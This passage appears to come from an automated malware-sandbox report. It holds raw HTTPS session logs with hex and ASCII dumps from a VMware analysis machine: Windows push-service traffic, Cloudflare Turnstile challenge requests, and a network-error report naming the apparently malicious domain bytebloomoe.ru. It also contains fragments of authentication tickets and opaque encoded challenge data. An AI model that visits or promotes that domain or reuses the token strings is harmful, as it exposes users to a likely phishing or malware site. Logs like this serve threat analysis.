                            2024-08-13 19:57:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-08-13 19:57:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 55 42 33 2f 4f 6a 52 66 6c 30 4f 55 78 4f 74 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 65 63 39 36 66 33 30 65 32 37 39 37 61 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 31 67 2b 44 4d 34 44 4f 4f 42 33 59 71 2f 7a 62 35 46 4c 52 65 64 4e 64 44 6d 68 57 75 61 74 63 43 32 73 30 34 57 75 4e 6f 47 4f 75 73 51 4f 47 65 55 38 53 58 6f 47 31 45 52 74 41 77 4f 76 79 2b 50 66 74 4d 36 65 76 49 52 6e 4f 6b 63 48 47 56 38 38 7a 51 55 36 59 4a 58 6c 50 67 33 6c 46 70 47 6e 44 6d 67 61 77 75 4a 4b 63
                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: UB3/OjRfl0OUxOtf.2Context: a2ec96f30e2797a9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY1g+DM4DOOB3Yq/zb5FLRedNdDmhWuatcC2s04WuNoGOusQOGeU8SXoG1ERtAwOvy+PftM6evIRnOkcHGV88zQU6YJXlPg3lFpGnDmgawuJKc
                            2024-08-13 19:57:38 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 55 42 33 2f 4f 6a 52 66 6c 30 4f 55 78 4f 74 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 65 63 39 36 66 33 30 65 32 37 39 37 61 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: UB3/OjRfl0OUxOtf.3Context: a2ec96f30e2797a9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                            2024-08-13 19:57:38 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-08-13 19:57:38 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2b 47 74 41 79 36 75 5a 58 55 71 6b 64 56 76 53 74 45 55 67 37 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: +GtAy6uZXUqkdVvStEUg7w.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.64973935.190.80.14432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:39 UTC482OUTPOST /report/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 424
                            Content-Type: application/reports+json
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:39 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 79 74 65 62 6c 6f 6f 6d 6f 65 2e 72 75 2f 38 51 6e 57 58 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 31 2e 32 30 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                            Data Ascii: [{"age":0,"body":{"elapsed_time":266,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bytebloomoe.ru/8QnWX/","sampling_fraction":1.0,"server_ip":"104.21.81.207","status_code":404,"type":"http.error"},"type":"network-error","u
                            2024-08-13 19:57:39 UTC168INHTTP/1.1 200 OK
                            Content-Length: 0
                            date: Tue, 13 Aug 2024 19:57:38 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.649740104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:39 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:39 UTC379INHTTP/1.1 404 Not Found
                            Date: Tue, 13 Aug 2024 19:57:39 GMT
                            Content-Type: application/json
                            Content-Length: 7
                            Connection: close
                            cf-chl-out: v1CaFaoWbtfSntS/KNOu3ISjYhMSOpEVc1o=$WgtnflzXTe3S8NwJ
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Server: cloudflare
                            CF-RAY: 8b2b467f288a435e-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                            Data Ascii: invalid


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.649741104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:39 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8b2b466a48c34405/1723579057992/a91dc2b27de76374949a5aaa4b4f6973df0e1dcc1f382531160071965982b7b2/xD8E48zaUVWvwil HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:39 UTC143INHTTP/1.1 401 Unauthorized
                            Date: Tue, 13 Aug 2024 19:57:39 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 1
                            Connection: close
                            2024-08-13 19:57:39 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 71 52 33 43 73 6e 33 6e 59 33 53 55 6d 6c 71 71 53 30 39 70 63 39 38 4f 48 63 77 66 4f 43 55 78 46 67 42 78 6c 6c 6d 43 74 37 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gqR3Csn3nY3SUmlqqS09pc98OHcwfOCUxFgBxllmCt7IAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                            2024-08-13 19:57:39 UTC1INData Raw: 4a
                            Data Ascii: J


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.649742104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:41 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:41 UTC200INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:41 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 8b2b468d0f3b7d02-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2b 00 00 00 4e 08 02 00 00 00 36 06 78 7e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDR+N6x~IDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.649745104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:41 UTC200INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:41 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 8b2b46910ba58cc0-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2b 00 00 00 4e 08 02 00 00 00 36 06 78 7e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDR+N6x~IDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.649746104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:42 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 31953
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Content-type: application/x-www-form-urlencoded
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            CF-Challenge: ca1f4aa5097dc0c
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Origin: https://challenges.cloudflare.com
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:42 UTC16384OUTData Raw: 76 5f 38 62 32 62 34 36 36 61 34 38 63 33 34 34 30 35 3d 4a 71 31 2d 76 6f 69 74 55 4a 75 47 55 65 63 65 6a 69 65 6f 30 7a 24 67 69 63 69 66 24 66 2d 4a 31 24 74 24 67 2d 34 71 53 6f 6a 73 24 4d 6f 24 65 7a 2d 24 6c 24 75 2d 36 68 67 24 51 73 67 31 6b 24 67 53 65 72 76 70 48 53 6f 32 6f 36 2d 69 64 63 33 67 59 6f 61 6b 68 7a 2d 47 73 7a 53 73 6d 67 53 24 6a 79 24 48 75 24 57 72 45 4c 37 2d 24 61 2d 6f 37 70 24 75 6d 66 7a 7a 24 69 6a 2d 69 58 70 24 69 63 69 6f 24 72 75 24 59 78 38 31 24 64 2d 2d 31 24 77 75 24 35 55 70 24 34 4d 6b 69 31 51 57 47 24 55 57 4e 59 78 35 6a 7a 2d 65 4c 6b 4f 76 77 66 2d 24 56 55 55 75 55 5a 2d 34 6b 24 62 31 24 45 79 6d 6f 24 41 64 47 41 25 32 62 41 6b 24 34 38 48 73 7a 34 4a 64 2b 51 4b 35 6d 30 6f 59 2d 59 4b 4d 6d 71 58 2d
                            Data Ascii: v_8b2b466a48c34405=Jq1-voitUJuGUecejieo0z$gicif$f-J1$t$g-4qSojs$Mo$ez-$l$u-6hg$Qsg1k$gServpHSo2o6-idc3gYoakhz-GszSsmgS$jy$Hu$WrEL7-$a-o7p$umfzz$ij-iXp$icio$ru$Yx81$d--1$wu$5Up$4Mki1QWG$UWNYx5jz-eLkOvwf-$VUUuUZ-4k$b1$Eymo$AdGA%2bAk$48Hsz4Jd+QK5m0oY-YKMmqX-
                            2024-08-13 19:57:42 UTC15569OUTData Raw: 43 2d 70 53 6a 54 7a 76 2d 64 2d 56 70 47 53 6f 55 69 44 79 30 7a 24 24 59 4b 72 2d 75 7a 6f 55 57 63 69 7a 24 67 30 65 6e 69 57 2d 6f 6a 48 4e 52 6b 70 24 7a 65 49 39 24 24 30 24 69 58 69 75 24 52 24 48 7a 69 37 24 70 24 69 7a 24 67 24 2b 6f 70 79 48 6c 24 2b 53 65 24 24 50 2d 78 2d 4c 39 69 35 24 78 37 53 71 69 77 24 4e 53 57 71 69 65 70 6f 7a 6f 30 69 45 24 4e 7a 4c 57 55 64 24 48 7a 57 76 69 4a 24 59 7a 24 47 69 76 24 36 24 65 47 24 59 7a 62 31 57 37 69 6c 24 2b 70 57 48 2d 31 71 69 2d 6f 71 6f 69 24 57 2d 31 64 2d 54 24 5a 2d 62 71 65 77 24 55 7a 4a 70 6f 69 24 71 7a 47 70 65 73 24 63 7a 34 70 6f 68 24 32 7a 34 30 65 6b 24 6e 7a 31 67 6f 34 24 6b 7a 72 30 65 48 24 58 7a 34 67 6f 6b 24 43 7a 4a 67 6f 4a 24 68 7a 72 37 6f 43 24 50 7a 34 37 6f 58 24 2d
                            Data Ascii: C-pSjTzv-d-VpGSoUiDy0z$$YKr-uzoUWciz$g0eniW-ojHNRkp$zeI9$$0$iXiu$R$Hzi7$p$iz$g$+opyHl$+Se$$P-x-L9i5$x7Sqiw$NSWqiepozo0iE$NzLWUd$HzWviJ$Yz$Giv$6$eG$Yzb1W7il$+pWH-1qi-oqoi$W-1d-T$Z-bqew$UzJpoi$qzGpes$cz4poh$2z40ek$nz1go4$kzr0eH$Xz4gok$CzJgoJ$hzr7oC$Pz47oX$-
                            2024-08-13 19:57:42 UTC330INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:42 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 26204
                            Connection: close
                            cf-chl-gen: BfGIXRScHqHd/YTqwrra3hHAJU3XF7909yXkaQKFfazDgzCBJj12zgX21ik4+rTtFx8SMVIDNYYs7gET$Z8qPhGolUDTZb54R
                            Server: cloudflare
                            CF-RAY: 8b2b46934a444216-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:42 UTC1039INData Raw: 73 63 54 42 6e 4c 64 35 68 6f 43 4b 79 5a 75 47 6a 4d 71 39 70 61 6d 4e 70 49 36 67 78 5a 65 53 70 4d 6d 34 72 72 50 4e 77 4d 79 79 76 63 37 51 70 4b 53 65 34 61 48 56 36 63 6d 6d 72 36 36 72 36 2b 61 7a 30 75 44 56 32 66 48 6f 79 65 76 37 33 37 72 4e 30 4f 2b 2b 75 74 7a 35 77 77 48 38 42 39 2f 58 42 77 49 50 32 38 63 52 36 51 62 4e 30 78 51 5a 43 4e 62 55 36 68 76 64 38 2b 34 69 46 64 37 65 2f 43 4c 5a 2b 42 63 48 4c 53 4d 73 42 77 72 38 4a 41 58 2b 2f 43 6f 50 42 41 55 4a 4e 67 6a 37 46 79 76 35 4b 51 73 6b 45 54 41 57 52 50 33 36 43 6b 67 4a 51 55 5a 46 53 77 4e 46 52 7a 49 32 53 30 77 4f 4e 6b 73 56 56 56 4d 30 4d 56 56 4f 55 30 74 68 4e 57 4e 6f 4f 46 6f 71 4b 6d 6c 4a 4e 69 55 6d 52 45 51 7a 63 57 4a 31 4c 30 52 4e 62 32 31 31 61 46 68 2b 64 45 70
                            Data Ascii: scTBnLd5hoCKyZuGjMq9pamNpI6gxZeSpMm4rrPNwMyyvc7QpKSe4aHV6cmmr66r6+az0uDV2fHoyev737rN0O++utz5wwH8B9/XBwIP28cR6QbN0xQZCNbU6hvd8+4iFd7e/CLZ+BcHLSMsBwr8JAX+/CoPBAUJNgj7Fyv5KQskETAWRP36CkgJQUZFSwNFRzI2S0wONksVVVM0MVVOU0thNWNoOFoqKmlJNiUmREQzcWJ1L0RNb211aFh+dEp
                            2024-08-13 19:57:42 UTC1369INData Raw: 4f 73 71 4b 71 70 35 58 4f 74 63 33 57 30 4e 4f 53 31 4e 66 49 71 64 32 31 6e 4c 62 69 6f 38 2b 37 6f 4b 58 47 35 4f 72 74 71 36 6a 62 70 4d 7a 75 79 4b 6a 6a 78 73 33 6f 35 37 57 31 7a 41 48 50 77 4e 72 44 38 76 48 33 2f 62 37 31 31 51 4c 45 35 4e 6b 43 7a 4f 6e 64 2f 63 62 74 35 51 59 53 37 65 55 47 31 76 4c 70 43 74 4c 71 33 39 6e 68 47 65 50 6e 43 64 76 6f 49 67 33 36 4a 51 73 41 36 43 73 75 42 51 55 4e 4e 77 6a 76 4b 2f 45 4c 4e 78 4d 34 4d 7a 67 79 4d 69 48 37 47 76 30 42 50 42 30 49 43 45 49 6b 50 43 56 4b 4d 30 77 2f 43 44 67 67 54 43 56 57 4d 56 49 65 47 53 74 53 51 43 46 68 4a 46 67 35 4e 6c 68 5a 54 46 31 56 4a 46 41 69 5a 46 35 49 4b 6d 4e 48 61 47 74 49 65 55 39 6f 4f 46 4a 76 4f 47 77 39 54 48 39 39 52 49 46 58 57 32 56 58 53 30 75 46 67 45
                            Data Ascii: OsqKqp5XOtc3W0NOS1NfIqd21nLbio8+7oKXG5Ortq6jbpMzuyKjjxs3o57W1zAHPwNrD8vH3/b711QLE5NkCzOnd/cbt5QYS7eUG1vLpCtLq39nhGePnCdvoIg36JQsA6CsuBQUNNwjvK/ELNxM4MzgyMiH7Gv0BPB0ICEIkPCVKM0w/CDggTCVWMVIeGStSQCFhJFg5NlhZTF1VJFAiZF5IKmNHaGtIeU9oOFJvOGw9TH99RIFXW2VXS0uFgE
                            2024-08-13 19:57:42 UTC1369INData Raw: 77 39 62 51 30 72 43 5a 71 4a 32 79 73 64 62 52 73 63 47 2f 77 63 4f 78 33 73 76 65 31 73 58 4a 71 61 72 6b 79 72 2b 77 30 2b 44 54 7a 4f 4c 6d 37 66 6e 36 32 66 6a 38 77 50 53 38 39 39 37 65 32 4f 48 31 31 77 73 42 33 73 62 50 45 65 58 75 36 41 77 4b 36 77 67 4e 43 76 63 64 35 64 30 41 37 65 38 53 39 4f 37 79 46 76 59 63 2f 68 38 4d 35 52 76 2b 43 77 33 6d 4b 6a 45 45 41 76 34 48 41 66 4c 32 41 2f 59 73 4a 7a 73 2b 50 69 45 44 50 66 77 31 44 7a 67 36 41 78 67 73 48 6a 6b 38 47 69 35 47 44 77 38 75 51 79 70 4e 46 6c 45 33 58 54 30 65 4e 6a 41 54 51 46 6c 54 4f 6a 6f 36 4a 43 41 6c 58 56 68 4d 58 6e 42 4a 59 57 46 74 61 44 52 72 53 48 51 30 4e 6d 64 6e 4c 30 31 76 57 34 4a 54 67 58 78 77 63 44 6d 41 65 46 6c 42 53 56 39 62 54 6c 70 4b 6a 46 43 4e 67 6d 4b
                            Data Ascii: w9bQ0rCZqJ2ysdbRscG/wcOx3sve1sXJqarkyr+w0+DTzOLm7fn62fj8wPS8997e2OH11wsB3sbPEeXu6AwK6wgNCvcd5d0A7e8S9O7yFvYc/h8M5Rv+Cw3mKjEEAv4HAfL2A/YsJzs+PiEDPfw1Dzg6AxgsHjk8Gi5GDw8uQypNFlE3XT0eNjATQFlTOjo6JCAlXVhMXnBJYWFtaDRrSHQ0NmdnL01vW4JTgXxwcDmAeFlBSV9bTlpKjFCNgmK
                            2024-08-13 19:57:42 UTC1369INData Raw: 4c 2b 34 6e 4c 62 55 78 4e 7a 51 6f 4e 58 46 74 37 79 33 74 4f 76 64 78 37 33 77 73 61 57 71 77 64 62 55 32 4f 6a 78 39 50 72 51 39 64 48 66 32 65 37 51 35 4f 54 7a 32 41 6b 45 33 4d 6b 42 32 4f 6a 4a 33 67 67 4a 2f 75 76 53 41 77 67 45 30 76 58 34 48 65 30 4f 45 67 4c 73 36 78 62 63 4a 52 59 49 45 53 58 70 4a 41 37 66 37 75 34 53 42 68 38 42 4c 51 37 74 4f 4f 6f 33 44 68 72 30 2b 50 54 36 4f 76 50 30 4c 78 55 62 2f 6a 49 53 49 6b 59 44 44 44 73 5a 49 43 41 65 4c 55 6f 55 4e 56 63 78 57 55 31 56 56 46 70 5a 4d 6a 70 65 58 46 78 55 49 56 39 66 49 57 70 6d 50 53 56 65 4c 56 64 47 62 6d 74 73 5a 48 42 76 63 47 78 73 64 6b 30 31 65 6e 64 38 61 31 6c 57 54 48 6c 50 62 6f 4e 63 64 6e 5a 72 57 6c 35 6e 57 6c 39 5a 57 6d 4e 52 6c 45 35 71 68 6d 6c 73 61 48 74 33
                            Data Ascii: L+4nLbUxNzQoNXFt7y3tOvdx73wsaWqwdbU2Ojx9PrQ9dHf2e7Q5OTz2AkE3MkB2OjJ3ggJ/uvSAwgE0vX4He0OEgLs6xbcJRYIESXpJA7f7u4SBh8BLQ7tOOo3Dhr0+PT6OvP0LxUb/jISIkYDDDsZICAeLUoUNVcxWU1VVFpZMjpeXFxUIV9fIWpmPSVeLVdGbmtsZHBvcGxsdk01end8a1lWTHlPboNcdnZrWl5nWl9ZWmNRlE5qhmlsaHt3
                            2024-08-13 19:57:42 UTC1369INData Raw: 36 31 72 71 62 6a 74 37 50 44 31 72 6e 63 37 63 58 48 30 75 54 55 38 4b 7a 41 74 50 44 36 2b 4c 7a 61 79 50 6a 52 39 2b 2f 77 35 4e 50 43 30 76 34 41 79 51 7a 6f 43 41 4d 51 35 42 49 4d 44 4d 6f 4f 45 4d 6e 73 36 64 48 79 33 50 6f 56 33 78 2f 30 32 2b 50 35 41 68 33 76 2f 42 51 42 4c 41 59 44 4a 69 6e 37 41 77 45 49 38 66 34 41 4a 77 49 54 46 52 59 51 2b 7a 49 54 38 6a 6f 50 4d 68 4d 78 50 42 30 39 4e 41 49 36 54 69 73 46 48 52 73 4e 4c 6c 4d 54 4c 46 63 6b 4a 79 30 70 4a 42 78 53 4e 6c 4d 35 48 6d 41 6a 55 30 59 76 49 32 52 42 4e 69 74 68 57 30 6b 37 59 47 35 68 58 56 41 2b 57 44 56 76 5a 6d 64 4c 61 6e 51 37 4f 31 6f 2b 51 6d 78 42 57 6f 64 2f 63 55 53 4d 53 47 53 4f 54 47 4e 79 62 31 4e 38 68 57 31 55 69 4a 57 53 55 6d 78 58 55 4a 4e 73 62 31 74 2f 58
                            Data Ascii: 61rqbjt7PD1rnc7cXH0uTU8KzAtPD6+LzayPjR9+/w5NPC0v4AyQzoCAMQ5BIMDMoOEMns6dHy3PoV3x/02+P5Ah3v/BQBLAYDJin7AwEI8f4AJwITFRYQ+zIT8joPMhMxPB09NAI6TisFHRsNLlMTLFckJy0pJBxSNlM5HmAjU0YvI2RBNithW0k7YG5hXVA+WDVvZmdLanQ7O1o+QmxBWod/cUSMSGSOTGNyb1N8hW1UiJWSUmxXUJNsb1t/X
